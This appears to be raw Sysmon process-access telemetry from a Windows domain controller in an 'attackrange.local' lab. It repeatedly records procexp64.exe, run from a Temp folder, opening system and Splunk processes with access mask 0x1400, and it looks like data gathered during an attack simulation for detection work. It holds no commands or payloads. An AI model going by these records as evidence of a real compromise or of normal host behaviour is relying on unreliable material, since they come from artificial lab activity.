15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 